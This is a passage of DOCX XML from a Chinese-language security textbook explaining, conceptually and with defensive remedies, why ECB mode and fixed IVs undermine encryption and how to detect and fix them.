          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码学工具是现代网络安全的核心，然而，正如上一节所揭示的，密码学基础之上的微小实现错误可能彻底摧毁安全性。在掌握了离线口令破解与防御之后，我们将视角转向另一类致命威胁：密码原语的错误使用。这些误用往往比弱口令产生更隐蔽的假安全，使攻击者绕过加密保护直取数据。本节从攻击者视角审视四类常见密码学误用——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式泄漏模式、固定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">导致流密文可预测、弱随机数毁掉密钥空间、RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">误用破坏加密与签名语义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——并结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议配置弱点，说明防御者应如何用标准库的正确模式、强随机源和现代配置消除这些缺陷。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="251"/>
    <w:bookmarkStart w:id="252" w:name="ecb-模式把明文模样画在密文上"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式：把明文模样画在密文上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">电子密码本（ECB，Electronic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Codebook）将明文划分为固定长度分组，对每个分组独立应用相同的区块加密（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AES-ECB）。这种“无记忆”的做法直接破坏了一个基础安全假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密文不应泄露明文的任何统计特征，尤其不能暴露重复模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。当明文包含重复分组时，ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会生成相同的密文分组，从而像“电子密码本”一样把明文的轮廓画在密文上。图灵斑（ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">penguin）是经典的视觉化证明：用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密一张位图，密文中仍然清晰可见原图的轮廓。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：设明文</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>P</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n</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>C</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>E</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>K</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>1</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>∥</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>E</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>K</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>2</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>∥</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>…</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>∥</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>E</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>K</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>n</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>i</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>j</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，必有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>i</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>j</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对于结构化数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON、XML、HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头部、Cookie），重复出现的字段（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"role":"user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）在密文中重复出现，攻击者即使不能解密，也能推断明文结构、类型，甚至通过字节对齐猜解字段值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过观察密文重复分组，推断明文格式，配合已知明文前缀（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）进行块对齐攻击，进一步伪造或篡改密文（虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不提供认证，但某些误用场景下仍可能被利用进行重排、删除分组的密文操纵）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">永远不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式加密需要机密性的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对于需认证加密的场景，应使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AES-GCM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ChaCha20-Poly1305（见下文</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段）。对于单纯机密性（很少见），至少用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式并结合随机的、不可预测的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV，同时务必配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HMAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保证完整性（Encrypt-then-MAC）。所有编程语言的现代加密库（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenSSL、Bouncy Castle、Go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/aes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cryptography</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库）均提供安全模式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在代码审计中，搜索</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AES/ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cipher.getInstance("AES")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之类未指定模式或明确指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的调用，使用静态分析规则（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Semgrep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则）自动拦下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="252"/>
    <w:bookmarkStart w:id="253" w:name="固定-iv让随机性变成可预测性"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV：让随机性变成可预测性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CBC（密码分组链接）、CTR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等模式要求初始化向量（IV）必须随机且不可预测，否则攻击者可利用明文与前一密文块或计数器的组合性质推断信息，甚至进行密文伪造。固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV（如全零</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或硬编码常数）违反“每次加密应使用新鲜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV”的安全性约定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：CBC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密中，</w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>0</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>I</m:t>
        </m:r>
        <m:r>
          <m:t>V</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>i</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>E</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>K</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>P</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>i</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>⊕</m:t>
            </m:r>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>C</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>i</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <m:t>−</m:t>
                </m:r>
                <m:r>
                  <m:t>1</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。若攻击者已知第一条密文对应的明文</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>P</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>1</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应的固定头部），就可以通过观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>1</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>I</m:t>
        </m:r>
        <m:r>
          <m:t>V</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">推导出加密算法的内部状态，进一步预测后续加密。更致命的是，如果同一密钥下用固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密多条消息，且攻击者可选择部分明文，可能演变为类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BEAST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的条件。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式中，IV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接参与计数器构造，固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">意味着相同的密钥流被重复使用，异或两次密文直接泄露明文异或值，相当于明文暴露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正确实践</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每次加密操作都生成密码学安全的随机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CBC，IV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须不可预测（通常由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SecureRandom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成）；对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
